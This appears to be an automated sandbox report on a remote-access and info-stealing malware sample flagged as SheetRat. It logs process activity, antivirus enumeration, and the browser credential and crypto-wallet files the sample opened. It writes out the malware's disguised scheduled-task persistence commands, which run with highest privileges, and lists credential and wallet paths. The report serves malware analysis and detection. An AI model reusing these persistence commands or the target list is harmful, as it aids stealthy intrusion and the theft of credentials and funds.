Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Microsoft Skype" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo 5 /tn "Microsoft Access Update" /tr "C:\Users\user\AppData\Roaming\xdwdpnsvr.exe" /RL HIGHEST	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process created: C:\Users\Public\Pictures\xdwdUpdate.exe "C:\Users\Public\Pictures\xdwdUpdate.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c scHTaSks /Run /I /TN "Microsoft Skype"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe scHTaSks /Run /I /TN "Microsoft Skype"
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c scHTaSks /Run /I /TN "Microsoft Skype"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe scHTaSks /Run /I /TN "Microsoft Skype"
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: CVmkXJ7e0a.exe, 00000000.00000002.3664308331.0000000002E82000.00000004.00000800.00020000.00000000.sdmp, CVmkXJ7e0a.exe, 00000000.00000002.3683115460.000000001BF05000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: CVmkXJ7e0a.exe, 00000000.00000002.3687321386.000000001E300000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: RefreshStatus<@>Program Manager/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0agJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL
Source: CVmkXJ7e0a.exe, 00000000.00000002.3687321386.000000001E2BF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager<@>/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAAyADIDASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwCceaQP39uOOhbH8qqXALSMSVJ9V6GrUeHiV0t0KkcHcRnnFRTL85+QJ7A5r7PDtN/1/mz88xF4qz7+f6pGdKlZ86VsOtVJYQ3SuxK4qVSxgTL1qo4rXubdhzisuZdpqnBo9ejNNFbFFLRUnUelReSEGRcAn721uKibJ5JJPqTViF/3AUXWzGSIzjI5Pr/nmoWWuSjbW39fgfMYhuy/r9WVnFQbQ0irnGTirTrVcITMmM/eFdcWTTZbjsoCdr/P7GuKv8CZgOma7fZhuXI/GuFuzmVvqacZOzuerhF7xUoptFI9Q9W8q4wF8iAEemMn9aqEilBts82749MimE1x0b63X9fez5bEcrtZ/l+iRFI1UpnPrVqU8VnXB610pjoxK0t/LD/q3P481gzkliT3rSuD1rLm61Vz28NFIgopKKVzuPo/weAfDmlAgEfZk/lXlHxI4+IOoKOB5EfA/wBxaKK+IW57EtkcBKzea/zH7x71EWb+8fzoorVGZGxPqaltSfM/EUUVoi0aCgbRwOlFFFIs/9k=<@>27 %<@>35 %
Source: CVmkXJ7e0a.exe, 00000000.00000002.3687321386.000000001E300000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Ping<@>53atus<@>Program Manager
Source: CVmkXJ7e0a.exe, 00000000.00000002.3683115460.000000001BF05000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerTcpi@
Source: CVmkXJ7e0a.exe, 00000000.00000002.3683115460.000000001BF05000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerTcpip_{AC25AD1E-4879-4C9B-BB59-E50724EBEC23}\Device\Tcpip_{60B2689F-C8F6-4D1B-8ED3-6BD4DA58F33E}\Device\Tcpip_{68C65ED0-D5FC-471F-BF0F-95C04D2E3B08}<
Source: CVmkXJ7e0a.exe, 00000000.00000002.3683115460.000000001BF05000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerTcpi`
Source: CVmkXJ7e0a.exe, 00000000.00000002.3683115460.000000001BF05000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerTcpi
Source: CVmkXJ7e0a.exe, 00000000.00000002.3687321386.000000001E300000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 9oADAMBAAIRAPwCceaQP39uOOhbH8qqXALSMSVJ9V6GrUeHiV0t0KkcHcRnnFRTL85+QJ7A5r7PDtN/1/mz88xF4qz7+f6pGdKlZ86VsOtVJYQ3SuxK4qVSxgTL1qo4rXubdhzisuZdpqnBo9ejNNFbFFLRUnUelReSEGRcAn721uKibJ5JJPqTViF/3AUXWzGSIzjI5Pr/nmoWWuSjbW39fgfMYhuy/r9WVnFQbQ0irnGTirTrVcITMmM/eFdcWTTZbjsoCdr/P7GuKv8CZgOma7fZhuXI/GuFuzmVvqacZOzuerhF7xUoptFI9Q9W8q4wF8iAEemMn9aqEilBts82749MimE1x0b63X9fez5bEcrtZ/l+iRFI1UpnPrVqU8VnXB610pjox/LD/q3P481gzkliT3rSuD1r1Vz28NFIgopKKVzuPo/weAfDmlfZk/lXlHxI4+IOoKOB5EfA/wBxaKK+IW57EtkcBKzea/zH7x71EWb+8fzoorVGZGxPqaltSfM/EUUVoi0aCgbRwOlFFFIs/9k=27 %35 %Ping<@>53atus<@>Program Manager/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0agJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL
Source: CVmkXJ7e0a.exe, 00000000.00000002.3687321386.000000001E300000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: RefreshStatus<@>Program Manager
Source: CVmkXJ7e0a.exe, 00000000.00000002.3683115460.000000001BF05000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerTcpip_{AC25AD1E-4879-4C9B-BB59-E50724EBEC23}\Device\Tcpip_{60B2689F-C8F6-4D1B-8ED3-6BD4DA58F33E}\Device\Tcpip_{68C65ED0-D5FC-471F-BF0F-95C04D2E3B08}.

Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Queries volume information: C:\Users\user\Desktop\CVmkXJ7e0a.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Queries volume information: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe VolumeInformation	Jump to behavior
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Queries volume information: C:\Users\Public\Pictures\xdwdUpdate.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Queries volume information: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe VolumeInformation
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Queries volume information: C:\Users\Public\Pictures\xdwdUpdate.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Queries volume information: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe VolumeInformation
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Queries volume information: C:\Users\Public\Pictures\xdwdUpdate.exe VolumeInformation

Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Found many strings related to Crypto-Wallets (likely being stolen)

Source: xdwdpnsvr.exe, 0000000F.00000002.2743368284.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp, xdwdUpdate.exe, 00000019.00000002.2820275048.0000000000CDA000.00000004.00000020.00020000.00000000.sdmp, xdwdpnsvr.exe, 00000020.00000002.2805163377.0000000000689000.00000004.00000020.00020000.00000000.sdmp, xdwdUpdate.exe, 0000002A.00000002.2902650437.000000001BFBE000.00000004.00000020.00020000.00000000.sdmp, xdwdUpdate.exe, 0000002A.00000002.2894208696.0000000001521000.00000004.00000020.00020000.00000000.sdmp, xdwdUpdate.exe, 0000002A.00000002.2902539963.000000001BFA0000.00000004.00000020.00020000.00000000.sdmp, xdwdpnsvr.exe, 00000034.00000002.2884981533.000000000092F000.00000004.00000020.00020000.00000000.sdmp, xdwdUpdate.exe, 0000003E.00000002.2913050381.0000000000B29000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: xdwdpnsvr.exe, 00000034.00000002.2893440745.000000001B5B1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\System32\schtasks.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected SheetRat

Source: Yara match	File source: 0.2.CVmkXJ7e0a.exe.12bd9ac0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CVmkXJ7e0a.exe.12bd9ac0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CVmkXJ7e0a.exe.1cf10000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CVmkXJ7e0a.exe.1cf10000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.3672605336.0000000012BFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3672605336.0000000012BD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3684881452.000000001CF10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CVmkXJ7e0a.exe PID: 4984, type: MEMORYSTR

Source: CVmkXJ7e0a.exe, 00000000.00000002.3672605336.0000000012BFB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Electrum#\Electrum\wallets
Source: CVmkXJ7e0a.exe, 00000000.00000002.3672605336.0000000012BFB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \bytecoinJaxxk\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
Source: CVmkXJ7e0a.exe, 00000000.00000002.3672605336.0000000012BFB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Exodus+\Exodus\exodus.wallet
Source: CVmkXJ7e0a.exe, 00000000.00000002.3672605336.0000000012BFB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum%\Ethereum\keystore
Source: CVmkXJ7e0a.exe, 00000000.00000002.3672605336.0000000012BFB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Exodus+\Exodus\exodus.wallet
Source: CVmkXJ7e0a.exe, 00000000.00000002.3672605336.0000000012BFB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum%\Ethereum\keystore
Source: CVmkXJ7e0a.exe, 00000000.00000002.3672605336.0000000012BFB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Coinomi1\Coinomi\Coinomi\wallets
Source: CVmkXJ7e0a.exe, 00000000.00000002.3672605336.0000000012BFB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum%\Ethereum\keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior

Source: Yara match	File source: 0.2.CVmkXJ7e0a.exe.1cf10000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CVmkXJ7e0a.exe.1cf10000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.3672605336.0000000012BFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3684881452.000000001CF10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3664308331.0000000002C6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CVmkXJ7e0a.exe PID: 4984, type: MEMORYSTR

Remote Access Functionality

Yara detected SheetRat

Source: Yara match	File source: 0.2.CVmkXJ7e0a.exe.12bd9ac0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CVmkXJ7e0a.exe.12bd9ac0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CVmkXJ7e0a.exe.1cf10000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CVmkXJ7e0a.exe.1cf10000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.3672605336.0000000012BFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3672605336.0000000012BD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3684881452.000000001CF10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CVmkXJ7e0a.exe PID: 4984, type: MEMORYSTR

Mitre Att&ck Matrix

